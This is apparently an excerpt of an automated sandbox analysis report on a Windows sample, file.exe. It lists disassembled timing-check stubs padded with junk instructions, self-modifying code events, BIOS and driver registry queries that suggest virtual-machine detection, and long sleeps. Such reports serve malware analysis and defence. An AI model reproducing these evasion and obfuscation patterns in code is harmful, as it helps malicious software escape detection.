              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0500 second address: 49E05D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC7B8E46E54h 0x00000018 xor ch, FFFFFFB8h 0x0000001b jmp 00007FC7B8E46E4Bh 0x00000020 popfd 0x00000021 push esi 0x00000022 pushfd 0x00000023 jmp 00007FC7B8E46E4Fh 0x00000028 adc cx, 007Eh 0x0000002d jmp 00007FC7B8E46E59h 0x00000032 popfd 0x00000033 pop eax 0x00000034 popad 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 pushad 0x00000039 mov di, D860h 0x0000003d jmp 00007FC7B8E46E59h 0x00000042 popad 0x00000043 mov eax, dword ptr fs:[00000018h] 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007FC7B8E46E53h 0x00000050 sub cx, 0FEEh 0x00000055 jmp 00007FC7B8E46E59h 0x0000005a popfd 0x0000005b popad 0x0000005c mov ecx, dword ptr [eax+00000FDCh] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E05D7 second address: 49E05DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E05DB second address: 49E05DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E05DF second address: 49E05E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E05E5 second address: 49E061D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, di 0x00000011 jmp 00007FC7B8E46E59h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E061D second address: 49E06B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7B8E88C07h 0x00000009 xor al, FFFFFFBEh 0x0000000c jmp 00007FC7B8E88C09h 0x00000011 popfd 0x00000012 jmp 00007FC7B8E88C00h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jns 00007FC7B8E88C30h 0x00000020 jmp 00007FC7B8E88C00h 0x00000025 add eax, ecx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FC7B8E88BFEh 0x0000002e adc esi, 0F29FC18h 0x00000034 jmp 00007FC7B8E88BFBh 0x00000039 popfd 0x0000003a mov ecx, 091DB7CFh 0x0000003f popad 0x00000040 mov ecx, dword ptr [ebp+08h] 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06B1 second address: 49E06B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06B5 second address: 49E06BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06BB second address: 49E06E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 53F13BDBh 0x00000008 mov ecx, 173DBAB7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test ecx, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC7B8E46E54h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06E5 second address: 49E06E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06E9 second address: 49E06EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D01B4 second address: 49D0231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edx, eax 0x0000000e jmp 00007FC7B8E88BFEh 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FC7B8E88C02h 0x0000001a xor cl, FFFFFFD8h 0x0000001d jmp 00007FC7B8E88BFBh 0x00000022 popfd 0x00000023 popad 0x00000024 push eax 0x00000025 jmp 00007FC7B8E88C09h 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC7B8E88C08h 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0231 second address: 49D0240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0240 second address: 49D0246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0246 second address: 49D024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D024A second address: 49D024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D024E second address: 49D0289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FC7B8E46E57h 0x0000000f sub esp, 2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC7B8E46E55h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0362 second address: 49D0368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0368 second address: 49D036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D036C second address: 49D03A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d jmp 00007FC7B8E88C06h 0x00000012 inc ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC7B8E88C07h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D03A9 second address: 49D0461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c mov eax, 001889A3h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC7B8E46E56h 0x00000018 xor ecx, 05A4FEE8h 0x0000001e jmp 00007FC7B8E46E4Bh 0x00000023 popfd 0x00000024 mov eax, 697006DFh 0x00000029 popad 0x0000002a popad 0x0000002b je 00007FC7B8E47086h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FC7B8E46E57h 0x0000003a sub ecx, 395626DEh 0x00000040 jmp 00007FC7B8E46E59h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007FC7B8E46E50h 0x0000004c sbb ch, FFFFFFD8h 0x0000004f jmp 00007FC7B8E46E4Bh 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0461 second address: 49D0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0467 second address: 49D046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D046B second address: 49D0485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea ecx, dword ptr [ebp-14h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov di, ax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D04D2 second address: 49D04DE instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov si, AAD1h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D04DE second address: 49D04E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D04E2 second address: 49D0506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FC7B8E46E4Ah 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC7B8E46E4Dh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0506 second address: 49D051B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D054F second address: 49D0553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0553 second address: 49D0559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0559 second address: 49D05EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7B8E46E4Ch 0x00000009 adc ah, 00000048h 0x0000000c jmp 00007FC7B8E46E4Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FC7B8E46E58h 0x00000018 jmp 00007FC7B8E46E55h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 test eax, eax 0x00000023 jmp 00007FC7B8E46E4Eh 0x00000028 jg 00007FC82A094D18h 0x0000002e jmp 00007FC7B8E46E50h 0x00000033 js 00007FC7B8E46EB5h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC7B8E46E57h 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D05EF second address: 49D0607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7B8E88C04h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0607 second address: 49D060B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D060B second address: 49D061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D061E second address: 49D0623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0623 second address: 49D069B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC82A0D6A65h 0x0000000f jmp 00007FC7B8E88C03h 0x00000014 mov ebx, dword ptr [ebp+08h] 0x00000017 jmp 00007FC7B8E88C06h 0x0000001c lea eax, dword ptr [ebp-2Ch] 0x0000001f jmp 00007FC7B8E88C00h 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FC7B8E88BFDh 0x0000002e or ax, 49A6h 0x00000033 jmp 00007FC7B8E88C01h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D069B second address: 49D06DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7B8E46E53h 0x00000009 add si, FCDEh 0x0000000e jmp 00007FC7B8E46E59h 0x00000013 popfd 0x00000014 mov ch, 8Bh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D06DD second address: 49D06E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D06E1 second address: 49D06E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D06E7 second address: 49D06ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D06ED second address: 49D06F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D06F1 second address: 49D0715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FC7B8E88C04h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0715 second address: 49D0732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0732 second address: 49D076B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 pushfd 0x00000006 jmp 00007FC7B8E88C08h 0x0000000b sbb ax, 0BF8h 0x00000010 jmp 00007FC7B8E88BFBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D076B second address: 49D076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D076F second address: 49D0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0775 second address: 49D079C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC7B8E46E4Eh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D079C second address: 49D07A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0815 second address: 49D081B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D081B second address: 49D081F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D081F second address: 49D0017 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FC82A094C63h 0x00000011 xor eax, eax 0x00000013 jmp 00007FC7B8E2057Ah 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 sub esp, 04h 0x00000023 mov esi, eax 0x00000025 cmp esi, 00000000h 0x00000028 setne al 0x0000002b xor ebx, ebx 0x0000002d test al, 01h 0x0000002f jne 00007FC7B8E46E47h 0x00000031 jmp 00007FC7B8E46F4Fh 0x00000036 call 00007FC7BD092865h 0x0000003b mov edi, edi 0x0000003d jmp 00007FC7B8E46E4Eh 0x00000042 xchg eax, ebp 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 movzx eax, di 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0017 second address: 49D00CF instructions: 0x00000000 rdtsc 0x00000002 call 00007FC7B8E88C09h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, edx 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC7B8E88C08h 0x00000015 sub ax, 85E8h 0x0000001a jmp 00007FC7B8E88BFBh 0x0000001f popfd 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 mov cl, 34h 0x00000025 popad 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 jmp 00007FC7B8E88BFDh 0x0000002e mov di, cx 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 pushad 0x00000035 push esi 0x00000036 mov eax, ebx 0x00000038 pop edi 0x00000039 mov cx, 5BB7h 0x0000003d popad 0x0000003e xchg eax, ecx 0x0000003f pushad 0x00000040 mov si, 0AAFh 0x00000044 pushfd 0x00000045 jmp 00007FC7B8E88C04h 0x0000004a sbb esi, 370EBDD8h 0x00000050 jmp 00007FC7B8E88BFBh 0x00000055 popfd 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FC7B8E88C04h 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D00CF second address: 49D00E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6FE76FE4h 0x00000008 mov ax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D00E4 second address: 49D00E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D00E8 second address: 49D00EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D00EC second address: 49D00F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D00F2 second address: 49D00F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D00F8 second address: 49D00FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0150 second address: 49D0154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0154 second address: 49D015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D015A second address: 49D0192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b call 00007FC7B8E46E4Eh 0x00000010 mov edi, esi 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC7B8E46E4Dh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0D56 second address: 49D0D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dx, si 0x00000008 popad 0x00000009 xor dword ptr [esp], 085F34D9h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC7B8E88C02h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0D7C second address: 49D0D8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0E4A second address: 49D0E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7B8E88BFEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0BA6 second address: 49E0BD6 instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007FC7B8E46E56h 0x0000000f mov dl, cl 0x00000011 pop edi 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movzx ecx, di 0x0000001c mov cl, bh 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0BD6 second address: 49E0C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC7B8E88BFCh 0x00000011 sbb al, FFFFFF98h 0x00000014 jmp 00007FC7B8E88BFBh 0x00000019 popfd 0x0000001a mov bx, si 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 mov edi, eax 0x00000023 mov eax, 20EF8EE3h 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a jmp 00007FC7B8E88C06h 0x0000002f push eax 0x00000030 pushad 0x00000031 mov ch, dh 0x00000033 mov ah, 7Eh 0x00000035 popad 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FC7B8E88C00h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0C51 second address: 49E0C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0C57 second address: 49E0C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0C5B second address: 49E0C80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC7B8E46E4Dh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0C80 second address: 49E0C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0C93 second address: 49E0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 95126E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 94FED4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 94FBD7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7ACC1D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 96566A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D3DD0C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F0AD8D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F79907 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5428Thread sleep time: -30015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 4308Thread sleep time: -36018s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2872Thread sleep time: -34017s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1696Thread sleep time: -240000s >= -30000sJump to behavior
